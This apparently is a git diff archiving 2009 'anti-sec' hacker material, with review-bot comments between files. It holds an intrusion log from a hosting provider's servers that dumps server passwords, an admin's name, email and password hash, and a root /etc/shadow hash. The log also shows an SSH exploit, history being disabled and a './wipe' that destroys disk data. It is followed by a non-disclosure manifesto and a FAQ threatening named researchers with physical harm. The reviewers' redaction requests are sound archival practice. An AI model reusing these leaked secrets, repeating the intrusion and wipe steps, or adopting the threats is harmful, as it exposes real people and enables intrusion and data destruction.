+-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
+-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
+-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
+-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
+-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
+-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
+-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
+-rw-------   1 billing billing       17 May 27  2008 .contactemail
+drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
+-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
+drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
+drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
+drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
+-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
+drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
+drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
+-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
+-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
+drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
+drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
+drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
+drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
+drwx------   4 billing billing     4096 Jun  7 21:53 ssl
+drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
+drwx------   2 billing billing     4096 May 27  2008 .trash
+lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
+-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc
+
+sh-3.2# cd www/
+
+sh-3.2# ls
+admin                 banned.php             configuressl.php  domainchecker.php  init.php             logout.php            postinfo.html       templates        
+viewticket.php  whois.php
+affiliates.php        billing                contact.php       downloads          installmingchowping  modules               _private            templates_c      _vti_bin
+aff.php               cart.php               creditcard.php    downloads.php      knowledgebase.php    networkissues.php     register.php        tutorials.php    _vti_cnf
+announcements.php     cgi-bin                dbconnect.php     htaccess.txt       lang                 networkissuesrss.php  serverstatus.php    upgrade          
+_vti_inf.html
+announcementsrss.php  clientarea.php         display.php       images             libs                 order.php             status              upgrade.php      _vti_log
+announcements.xml     configuration.php      dl.php            includes           link.php             passwordreminder.php  submitticket.php    viewemail.php    _vti_pvt
+attachments           configuration.php.new  dologin.php       index.php          login.php            pipe                  supporttickets.php  viewinvoice.php  _vti_txt
+
+sh-3.2# cat configuration.php
+
+
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 11021136
+Server version: 5.0.81-community MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+mysql> use billing_billing;
+
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+
+Database changed
+
+mysql> show tables;
++----------------------------+
+| Tables_in_billing_billing  |
++----------------------------+
+| mod_ipmanager              |
+| mod_ipmonitor              |
+| tblaccounts                |
+| tblactivitylog             |
+| tbladdons                  |
+| tbladminlog                |
+| tbladminperms              |
+| tbladminroles              |
+| tbladmins                  |
+| tbladminsecurityquestions  |
+| tblaffiliates              |
+| tblaffiliatesaccounts      |
+| tblaffiliateshistory       |
+| tblaffiliatespending       |
+| tblaffiliateswithdrawals   |
+| tblannouncements           |
+| tblbannedemails            |
+| tblbannedips               |
+| tblbillableitems           |
+| tblbrowserlinks            |
+| tblcalendar                |
+| tblcancelrequests          |
+| tblclientgroups            |
+| tblclients                 |
+| tblconfiguration           |
+| tblcontacts                |
+| tblcredit                  |
+| tblcurrencies              |
+| tblcustomfields            |
+| tblcustomfieldsvalues      |
+| tbldomainpricing           |
+| tbldomains                 |
+| tbldomainsadditionalfields |
+| tbldownloadcats            |
+| tbldownloads               |
+| tblemails                  |
+| tblemailtemplates          |
+| tblfraud                   |
+| tblgatewaylog              |
+| tblhosting                 |
+| tblhostingaddons           |
+| tblhostingconfigoptions    |
+| tblinvoiceitems            |
+| tblinvoices                |
+| tblknowledgebase           |
+| tblknowledgebasecats       |
+| tblknowledgebaselinks      |
+| tbllinks                   |
+| tblnetworkissues           |
+| tblnotes                   |
+| tblorders                  |
+| tblpaymentgateways         |
+| tblpricing                 |
+| tblproductconfiggroups     |
+| tblproductconfiglinks      |
+| tblproductconfigoptions    |
+| tblproductconfigoptionssub |
+| tblproductgroups           |
+| tblproducts                |
+| tblpromotions              |
+| tblquoteitems              |
+| tblquotes                  |
+| tblregistrars              |
+| tblservers                 |
+| tblsslorders               |
+| tbltax                     |
+| tblticketbreaklines        |
+| tblticketdepartments       |
+| tblticketescalations       |
+| tblticketlog               |
+| tblticketmaillog           |
+| tblticketnotes             |
+| tblticketpredefinedcats    |
+| tblticketpredefinedreplies |
+| tblticketreplies           |
+| tbltickets                 |
+| tblticketspamfilters       |
+| tbltodolist                |
+| tblupgrades                |
+| tblwhoislog                |
++----------------------------+
+80 rows in set (0.00 sec)
+
+mysql> select name,ipaddress,hostname,username,password from tblservers;
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+| name         | ipaddress      | hostname         | username | password                                                                 |
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
+| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
+| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
++--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
+3 rows in set (0.00 sec)
+
+mysql> select firstname,lastname,email,username,password from tbladmins;
++-----------+----------+-----------------+----------+----------------------------------+
+| firstname | lastname | email           | username | password                         |
++-----------+----------+-----------------+----------+----------------------------------+
+| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
++-----------+----------+-----------------+----------+----------------------------------+
+1 row in set (0.06 sec)
+
+mysql> quit
+Bye
+
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda5             2.0G  477M  1.4G  26% /
+/dev/sda8             875G  147G  684G  18% /home
+/dev/sda3             9.7G  6.8G  2.5G  74% /usr
+/dev/sda2             9.7G  7.0G  2.3G  76% /var
+/dev/sda1              99M   23M   72M  24% /boot
+/dev/sda6             996M   64M  881M   7% /tmp
+tmpfs                 3.9G     0  3.9G   0% /dev/shm
+/dev/sdb1             459G  163G  273G  38% /backup
+
+sh-3.2# ./wipe
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda5              64Z   64Z  1.5G 100% /
+/dev/sda8              64Z   64Z  729G 100% /home
+/dev/sda3              64Z   64Z  3.0G 100% /usr
+/dev/sda2              64Z   64Z  3.0G 100% /var
+/dev/sda1              16Z   16Z     0 100% /boot
+/dev/sda6              64Z   64Z  933M 100% /tmp
+tmpfs                 3.9G     0  3.9G   0% /dev/shm
+/dev/sdb1              64Z   64Z  296G 100% /backup
+
+sh-3.2# exit
+exit
+
+
+-----------------------------------
+
+osiris			[ DOWN ]
+devil			[  UP  ]
+
+-----------------------------------
+
+anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
+
+		[+] 0wn0wn - anti-sec group
+		[+] Target: 66.197.204.101
+		[+] SSH Port: 22
+		
+		[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+
+sh-3.2# export HISTFILE=/dev/null
+
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# uname -a
+Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
+
+sh-3.2# head -n1 /etc/shadow
+root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
+
+sh-3.2# w
+ 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop
+
+sh-3.2# pwd
+/root
+
+sh-3.2# ls -la
+total 1232
+drwxr-x--- 23 root root   4096 Jul  4 04:06 .
+drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
+-rw-------  1 root root    957 Jun 13 05:20 .accesshash
+-rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
+-rw-------  1 root root   7258 Jun 30 10:03 .bash_history
+-rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
+drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
+-rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
+drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
+-rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
+drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
+drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
+drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
+drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
+-rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
+drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
+-rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
+-rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
+drwx------  2 root root   4096 Jun 12 01:51 .elinks
+-rw-r--r--  1 root root     16 Jun 13 15:33 .forward
+drwx------  3 root root   4096 Jun 11 23:59 .gconf
+drwx------  2 root root   4096 Jun 11 23:59 .gconfd
+drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
+drwx------  2 root root   4096 Jun 12 01:53 .gnupg
+drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
+-rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
+-rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
+-rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
+drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
+-rw-------  1 root root     37 Jun 12 02:11 .my.cnf
+drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
+-rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
+-rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
+drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
+drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
+-rw-------  1 root root   1024 Jun 12 02:50 .rnd
+drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
+drwx------  2 root root   4096 Jun 22 09:11 .ssh
+-rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
+drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
+drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi
+
+sh-3.2# cat .bash_history
+sh hninst.sh
+passwd
+fdisk -l
+exit
+w
+history
+screen -ls
+screen -r 2785.pts-0.devil
+exit
+wget http://merovingian.net.nz/htop-0.8.1.tar.gz
+[snip]
+csf -a 125.238.144.110
+exit
+cd /home
+ls
+wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
+[snip]
+wget http://visit4cash.net/mainfiles.tar.gz
+mv mainfiles.tar.gz /home/visit4ca/public_html
+cd /home
+cd visit4ca
+cd public_html
+ls
+tar zxvf mainfiles.tar.gz
+[snip]
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.165.50.38
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 89.38.206.233
+csf --restart
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+csf -d 118.94.59.33
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+[snip]
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
+screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
+
+sh-3.2# cat /etc/userdomains
+advertising.ssanz.net: adserver
+forums.visit4cash.net: forumsv4
+megacashzone.com: megacash
+visit4cash.net: visit4ca
+seanone.com: seanonec
+backup2.ssanz.net: backup2
+*: nobody
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda3              31G  7.5G   22G  26% /
+/dev/sdb1             452G   35G  394G   9% /home
+/dev/sda1              99M   23M   72M  24% /boot
+tmpfs                 495M  4.0K  495M   1% /dev/shm
+/usr/tmpDSK           485M   14M  446M   3% /tmp
+
+sh-3.2# who
+root     pts/0        2009-07-03 20:18 (125.238.144.224)
+
+sh-3.2# ./wipe
+
+sh-3.2# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda3              64Z   64Z   24G 100% /
+/dev/sdb1              64Z   64Z  417G 100% /home
+/dev/sda1              16Z   16Z   77M 100% /boot
+tmpfs                 495M  4.0K  495M   1% /dev/shm
+/usr/tmpDSK           485M   14M  446M   3% /tmp
+
+sh-3.2# exit
+exit
+
+
+-----------------------------------
+
+osiris			[ DOWN ]
+devil			[ DOWN ]
+
+-----------------------------------
+
+Once again, practice what you preach. Don't claim to be something you're not.
+Most importantly, don't go after us. We're not the problem. What you say does
+not align AT ALL with what you actually do with your servers.
+
+Fix that first, you dig?
+
+~ There will always be no way out.
+
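Review bot: This new file commits third-party secrets and personal data verbatim. It includes both `head -n1 /etc/shadow` outputs (root password hashes), the `password` column of the `tblservers` query, and the `tbladmins` row with the admin's name, e-mail address and password hash. It also carries the `/etc/userdomains` account mappings and the login source addresses shown by `w`, `who` and `lastlog`. Keep the commands for the historical record, but replace those values with `[redacted]` placeholders before import, since anything committed here stays in history. Separately, `cat configuration.php` is followed by no output. Mark that gap with `[snip]`, as the rest of the transcript does, so readers can tell the content was elided rather than empty.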
diff --git a/anti-sec/txt/ats-policy.txt b/anti-sec/txt/ats-policy.txt
new file mode 100644
index 0000000..438d26a
--- /dev/null
+++ b/anti-sec/txt/ats-policy.txt
@@ -0,0 +1,223 @@
+~~~
+~		       Anti security "policy" v0.9 by anonymous
+~		       - Save the bugs! 
+~
+~~~
+
+-- This is my view and it does not fully speak for all the people
+-- that are involved in anti security and it is subject to heavy change.
+
+Content:
+
+Introduction.
+What is this policy?
+Purpose of the policy.
+Is this a joke ?
+The policy.
+Using the policy.
+Contribute to the policy.
+Thanks & reference.
+
+
+[ Introduction ]
+
+Hello. 
+
+This policy is designed to try to advocate a new a completly different
+policy for the underground community that is designed for "anti disclosure"
+basicly the opposite of full disclosure but with a few side notes that advocate
+some disclosure of bug information but in general this is designed to be a 
+policy that people will read and think, "Hey.. this is the right thing!",
+hopefully.
+
+
+[ What is this policy ]
+
+This policy is basicly a guideline.
+
+It will demonstrate that it is not good to post bug/exploit information to
+places like BUGTRAQ, packetstorm, other public forums. It will show that
+most of the people that are excessively posting bugs to these public forums 
+are  actually not doing it for security but quite the contrary for things
+like fame, jobs, etc.
+
+The policy will show you that if you are really interested in security
+that there is a much better way of increasing security, because basicly
+when you send a new bug and an exploit to a place like BUGTRAQ you are
+actually decreasing security and potentially causing hundreds of thousands
+of people high damage from when script kiddies use your bug/exploit to
+break into their system.
+
+
+It will demonstrate the best way to maintain the anti security policy 
+which is to keep bugs/exploits private within either a very small group
+of trusted people that have the skill to understand what it is about or just
+simply keep it for yourself. If however the exploit leaks you should contact 
+vendor and tell him about the bug. If the bug is discovered by someone else
+or the vendor has fixed the problem you are free to post the exploit to a
+non public forum, maybe your website.
+
+Also it is essential to demonstrate that a person that is looking for security 
+bugs does so just for the sheer enjoyment and thrill, difficulty of finding 
+and obvious bug or a very difficult to find bug and then possible exploiting
+it, after this has taken place he should carry  on and start looking for other
+bugs, ie: by auditing src code, doing protocol 'checks', reverse engineering
+and using security logic. This is an important thing in this policy that needs
+to be addressed. We do this because we love it!
+
+ 
+[ Purpose of the policy ]
+
+
+The purpose of this policy is to raise public awareness of a new way 
+of thinking in the security scene, it is written to try to help out 
+the anti security movement and to show interested people the best
+way to be a part of the anti security movement, by using this policy.
+
+One of the main reasons for this policy and what it is meant to address is the
+need for none-disclosure, which is basicly because way too much stuff  is
+getting sent to BUGTRAQ and people like us really dont like it that way
+and we hope that you wont like it either after studying anti security. 
+
+The purpose of this policy is to give people that are hackers a policy
+that they can use to keep things private as they should remain and not
+tempted by the dark side.
+
+[ Is this a joke? ]
+
+For some reason a lot of people think this is a joke, I've been asked about 4 
+times wether this whole anti security thing is a joke. And to answer your
+question about this policy, No! It is not a joke we take this seriously but
+we welcome any flames, comments or whatever that anyone might have.
+
+
+
+[ The policy ]
+
+
+
+The policy in a nutshell.
+
+1. Do not tell the world about security bugs you find.
+2. Do not release exploits to public forums.
+3. If you are serious about security, notify only vendor.
+4. If exploit leaks, notify vendor.
+5. If bug becomes public, you are safe to release exploit to 
+   a none public forum.
+6. Never ever give bug or exploit information out on a bug/exploit
+   trusted to you by the discoverer/author of the bug/exploit. This
+   is basis for trust, do not give what you did not write!
+
+This will demonstrate basicly the steps and scenarios that might 
+happen and how the policy is used in those steps, thus describing the
+policy.
+
+note: fiction ;>
+
+Okay let's create a few variables.
+
+HACKER = The person that wants to use the anti security policy
+VENDOR = Company or group that wrote the program that HACKER found bug in
+COMMUNITY = BUGTRAQ, PACKETSTORM, and the like.
+
+Background:
+
+HACKER is an avid auditer and finds a bug in bind-8.2.2-P7 a 1 byte overflow
+which is pretty difficult to exploit but he manages, he writes an exploit
+for this bug and he gives it to a very small amount of people, possible
+people that are maybe in his group or that he trusts explicitly.
+
+< scenario 1 >
+
+HACKER who is a follower of the anti security policy does not notify the
+community or the vendor and the bug lives on for many years, hopefully ;>
+Causing little or no damage at all.
+
+< scenario 2 >
+
+HACKER is a TRUE security minded person, ie: someone that really cares
+about security and is not the typical "hey I say I care about security
+but what I really want is fame and a job". Allright this person who 
+also has hopefully read something about the anti security movement and
+since he really apreciates security he should ONLY contact the vendor and 
+let them handle it.
+
+< scenario 3 >
+
+HACKER is a glory/fame seeker and he decides to post the bug to the
+COMMUNITY. Ofcorse he says it is in the interest of full disclosure 
+and not fame and the like. He has read some full disclosure 
+policy and notifies vendor maybe 5 days before he releases the bug and
+most likely the exploit too. 
+
+After the five days have passed, we must conclude that the vendor has issued
+some sort of hotfix or a patch to fix the security problem and now the HACKER
+sends the bug information, the exploit to the COMMUNITY and possible a
+patch too. 
+
+Now has security been increased? Do you really think that most of COMMUNITY. 
+ie: the people that read BUGTRAQ want to patch their servers? No! It is 
+script kiddies that are waiting for the latest warez, as soon as HACKER
+releases this new bug to the COMMUNITY thousands of script kiddies with
+little or no skill will start breaking into hundreds of thousands
+of boxes and if this bug were genuine, they would! And belive me lots of 
+boxes would get destroyed.
+
+Now, I ask.. is this a good thing you are doing by posting to the COMMUNITY
+all logic says NO!
+
+< scenario 4 >
+
+HACKER in this scenarion followed the anti security movement.
+
+HACKER has had the  exploit for a year or more and now for some strange
+reason you hear rumors that script kiddies have the exploit. If these rumors
+turn out to be correct you have an obligation to notify the vendor, so that
+they can issue a patch, because this can cause just as much havoc as when 
+people post to the COMMUNITY
+
+Q: Well what is the damn difference then?!? It is bound to leak someday. 
+A: Yes it happens much to often but there is alot of stuff out there
+   that has not leaked and the best way to not make things leak is too 
+   not give to anyone at all. This however is not possible for some so   
+   the best thing is to limit it to ONLY people that you trust 100 %.
+   And we hope that people that follow the anti security trend will
+   also realize a crucial point which is not to give what u didn't write!
+
+
+
+
+Someone else has found the bug that HACKER found and has notified the
+COMMUNITY and VENDOR. After this has happened HACKER is free to publish
+his code on a non-public forum, like his personal website. This however is not
+required at all.
+
+
+[ Using the policy ]
+
+Follow the guidelines that were outlined in previous sections, and remember
+what keynotes.
+
+[ Contribute to the policy ]
+
+This policy is considered pre-beta and is subject to heavy change. We need
+alot of help in adjusting this policy and so if you have any ideas about
+things that are not clear and how to clear them up then please send us
+that information. Also if you have things you would like to add/tweak
+just send it.
+
+
+[ Thanks and reference ]
+
+This policy is written by anonymous and it will remain that way because
+it is not supposed to portrait the views on a single person but of all
+the people that follow this movement.
+
+However certain groups and people deserve credit:
+
+silent for starting anti security and doing most of the work.
+jimjones for writing the great intro and FAQ!
+RFP for writing a policy for the full disclosure people.
+Everyone that has contributed so far!
+
+
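Review bot: in ats-policy.txt the four empty lines after the Q/A in scenario 4 are followed by a paragraph ("Someone else has found the bug that HACKER found ...") that reads like a separate scenario matching rule 5 of the policy, yet no scenario marker precedes it. Please compare this against the copy you mirrored from and either restore the marker or say in the commit message that the gap is in the source. The same check applies to "remember what keynotes." under [ Using the policy ], which looks cut off. Several added lines also end in a trailing space (for example "asked about 4 "), which git apply --whitespace=error would reject; if the whitespace is kept on purpose for a verbatim mirror, state that in the commit message.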
diff --git a/anti-sec/txt/faq1.txt b/anti-sec/txt/faq1.txt
new file mode 100644
index 0000000..1bb18aa
--- /dev/null
+++ b/anti-sec/txt/faq1.txt
@@ -0,0 +1,92 @@
+THIS MOVEMENT IS APART OF THE ANTI-SEC / ANTI-WHITEHAT MOVEMENT.
+
+THIS IS NOT A JOKE READ THE ENTIRE FUCKING FAQ.
+
+THIS IS THE SIMPLE #PHRACK FAQ:
+
+keep this in mind: when speaking of phrack "magazine" we mean that whitehat
+magazine on phrack.org. also we use examples, but this applies to all people
+and websites that fall into these categories.
+
+1) what is a whitehat?
+a) A WHITEHAT IS ANYONE WHO HELPS THE SECURITY INDUSTRY (POSTING BUGS/INFO ETC)
+
+2) are there greyhats?
+a) NO, ONCE A PERSON HAS THE EVIL WHITEHAT WAYS INSIDE OF THEM, THEY BECOME A PURE WHITEHAT, PLAIN AND SIMPLE.
+
+3) how come "blackhats" are helping the security industry (bugtraq/phrack)?
+a) THE SECURITY INDUSTRY INFECTS HACKERS WITH THESE EVIL THOUGHTS. THE
+   SECURITY INDUSTRY BRAINWASHES HACKERS TO WORK FOR THEM (BY PUBLISHING THIS
+   BUG/INFO/CODE INFORMATION). ALSO THESE PEOPLE ARE NOT BLACKHATS, THEY ARE
+   WHITEHATS BASED ON QUESTION #2. THE PROBLEM IS THAT THEY DO NOT REALIZE IT.
+   ALSO MOST OF THESE SO CALLED "BLACKHATS" DONT HACK. REAL HACKERS DO NOT 
+   ACTUALLY PUBLICIZE SUCH INFORMATION (TO PHRACK BUGTRAQ ETC).
+
+4) how is phrack a whitehat magazine?
+a) EVERY TECHNIQUE THAT IS RELEASED IN PHRACK IS NOW REALIZED BY THE SECURITY
+   INDUSTRY. THE SEC INDUSTRY NOW SPENDS TIME TO THWART THESE TECHNIQUES.
+
+   ALSO, ALOT OF THE ARTICLES IN PHRACK DO NOT BENEFIT THE "HACKER SCENE"
+   AT ALL. HOW IS IT POSSIBLE THAT "POSITIVE" IDS ARTICLES OR HONEYPOT
+   KEYLOGGERS MAKE THERE WAY INTO A "for hackers by hackers" MAGAZINE?
+
+5) what are people like spaf/chris rouland/lance then?
+a) THEY ARE THE ENEMY. WHITEHATS = ENEMY.
+
+6) im confused, i thought k2 is a blackhat but he helps with honeypot?
+a) HES NOT A BLACKHAT, HES A BAD ROLE MODEL FOR ALL HACKERS. HE IS 
+   BRAINWASHED BY THE SECURITY SCENE. IF HE CHANGES - GOOD FOR HIM. IF HE
+   CONTINUES HIS WAYS - HE WILL CONTINUE TO BE THE ENEMY.
+
+7) i get what you're saying now, so like k2/duke/horizon/scut (for example)
+   aren't really hackers, they are just brainwashed by the security industry
+   to work for them?
+a) THIS IS ABSOLUTELY FUCKING CORRECT.
+
+8) so what am i supposed to do?
+a) STOP MAKING ANY OF YOUR INFORMATION PUBLIC. BY INFORMATION WE MEAN
+   CODE,BUGS,TECHNIQUES ETC. KEEP THIS INFORMATION PRIVATE. DON'T TRADE
+   IT ON IRC. DON'T ENTRUST THIS INFORMATION INTO INDIVIDUALS YOU DONT
+   TRUST 100% (SOME PEOPLE TURN AROUND AND LEAK ALL YOUR SHIT OR THEY
+   END UP SELLING IT TO ISS). AND FOR FUCKS SAKE, TRY ACTUALLY USING
+   WHAT YOU CODE/FIND.
+
+9) why do people like that whitehouse guy say "hackers shouldnt help criminals"
+   or "hackers should help security industry by responsibly disclosing bug
+   information to companies"?
+a) THIS IS APART OF THE MASSIVE CAMPEIGN TO GET HACKERS TO WORK FOR THEM.
+   THE FACT IS THAT IF THE "HACKING SCENE" DOESNT HELP THE SECURITY INDUSTRY,
+   THEY WILL BECOME LOST BECAUSE THEY ARE A BUNCH OF COMPLETE IDIOTS. THE
+   BEST BUGS/INFORMATION IS USUALLY GIVEN TO THE SECURITY INDUSTRY BY PEOPLE
+   IN THE "HACK SCENE", AND THIS IS A FACT. IT MUST STOP.
+
+10) how can i help?
+a) HELP SPREAD THIS WAY OF THINKING TO EVERYONE YOU KNOW, ONCE PEOPLE REALIZE
+   THEY ARE BEING BRAINWASHED AND PROFITTED OFF OF, THEY WILL CHANGE. IF YOU 
+   WANT TO MAKE A SIGNIFICANT CHANGE, START MAYBE THINKING ABOUT PROJECT MAYHEM.
+
+11) ok, but like what if i dont want to change now? "lol"
+a) YOU WILL BE HUNTED DOWN LIKE K2, DERAADT, DUGSONG, ETC. THE INTERNET
+   IS NO LONGER SAFE FOR WHITEHATS. NO LONGER SAFE FOR THE SECURITY INDUSTRY.
+
+12) what should whitehats think of this movement?
+a) WHITEHATS/SECURITY INDUSTRY PEOPLE SHOULD BE AFRAID OF THIS MOVEMENT.
+   IT SEEMS THAT HIGH MEMBERS OF THE SECURITY INDUSTRY HAVE ALREADY FALLEN
+   VICTIM TO THIS MOVEMENT. THEY SHOULD STOP PUBLICLY MAKING AVAILABLE
+   INFO SUCH AS "BUGS" OR "CODE" OR "TECHNIQUES". IF THEY DO NOT CHANGE
+   THEY WILL CONTINUE TO BE TARGETED, AND IT SUCKS TO GET OWNED/FIRED/
+   PHYSICALLY BEATEN.
+
+13) why does #phrack like DMCA?
+   DMCA MAKES IT SO THAT PEOPLE CAN'T POST THESE BUGS/CODE ETC. READ UP
+   ON IT. IT WILL BE A GREAT WEAPON FOR THIS MOVEMENT ONCE IT STARTS
+   BEING ENFORCED ON A REGULAR BASIS.
+
+14) ya ok, i think im going to change, this isn't some joke right?
+a) NO IT ISN'T A JOKE. SECURITY INDUSTRY CANT SURVIVE AT ALL WITHOUT
+   THE SELLOUTS & BRAINWASHED SECTION OF THE HACKER SCENE. CHANGE YOUR
+   FUCKING WAYS. DONT POST. DONT HELP THE SECURITY INDUSTRY.
+
+   STOP... BEING.... BRAINWASHED......................
+
+THE END: written in 25 minutes by the PHC, so dont bug us.
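Review bot: faq1.txt is added with no source URL or date, although answer 11 names individuals as targets ("HUNTED DOWN LIKE K2, DERAADT, DUGSONG") and answer 12 threatens physical harm. For an archive, please record where and when this text was published and mark it as historical material kept for reference, either in a header comment outside the mirrored text or in the README, so a reader landing on the file alone can tell what it is. Minor: question 13 has no "a)" marker before its answer, unlike the other thirteen items; confirm that matches the source rather than being lost in the import.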
diff --git a/anti-sec/txt/faq2.txt b/anti-sec/txt/faq2.txt
new file mode 100644
index 0000000..18960a0
--- /dev/null
+++ b/anti-sec/txt/faq2.txt
@@ -0,0 +1,70 @@
+Ok, lately more and more people kept asking the same questions.. They forced me to write down this FAQ so, read it and then ask questions!
+
+1. What the fuck is pr0j3kt m4yh3m i been hearing about?
+
+Pr0j3kt m4yh3m is the movement started by a group of blackhats that decided
